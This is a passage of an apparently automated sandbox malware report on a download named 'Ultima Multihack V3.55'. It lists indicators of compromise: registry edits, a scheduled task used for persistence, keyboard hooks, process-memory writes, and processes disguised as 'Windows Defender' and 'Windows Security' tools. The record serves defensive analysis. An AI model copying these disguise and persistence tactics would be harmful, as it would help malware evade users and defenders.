Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Control Panel 2 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Control Panel\Desktop\WallpaperStyle = "2"	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Control Panel\Desktop\TileWallpaper = "0"	csrss.exe

Modifies data under HKEY_USERS 20 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "159"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895659034012815"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "4"	chrome.exe
Key created	\Registry\User\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\NotificationData	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Ultima Multihack V3.55.rar:Zone.Identifier	chrome.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5304	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
2196	powershell.exe
2196	powershell.exe
2196	powershell.exe
1168	powershell.exe
1168	powershell.exe
1168	powershell.exe
1876	chrome.exe
1876	chrome.exe
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
2000	WINDOWS SECURITY NANO.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
5072	ULTIME MULTIHACK REBORN.EXE
2840	WINDOWS DEFENDER.EXE
2840	WINDOWS DEFENDER.EXE
2840	WINDOWS DEFENDER.EXE
2840	WINDOWS DEFENDER.EXE

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
3792	chrome.exe
2000	WINDOWS SECURITY NANO.EXE
5652	msdcsc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 56 IoCs

pid	Process
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
4200	msedge.exe
4200	msedge.exe
6900	chrome.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe
Token: SeShutdownPrivilege	5820	chrome.exe
Token: SeCreatePagefilePrivilege	5820	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
4704	WindowsTerminal.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe

Suspicious use of SendNotifyMessage 52 IoCs

pid	Process
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
5820	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
3544	chrome.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
6900	chrome.exe
4200	msedge.exe
4200	msedge.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
712	chrome.exe
3792	chrome.exe
1164	Ultima Multihack V3.55.exe
1264	file5.exe
668	VLC1.EXE
5652	msdcsc.exe
1876	msdcsc.exe
4704	WindowsTerminal.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
4316	WindowsTerminal.exe
4708	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5820 wrote to memory of 224	5820	chrome.exe	78
PID 5820 wrote to memory of 224	5820	chrome.exe	78
PID 5820 wrote to memory of 2276	5820	chrome.exe	79
PID 5820 wrote to memory of 2276	5820	chrome.exe	79
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
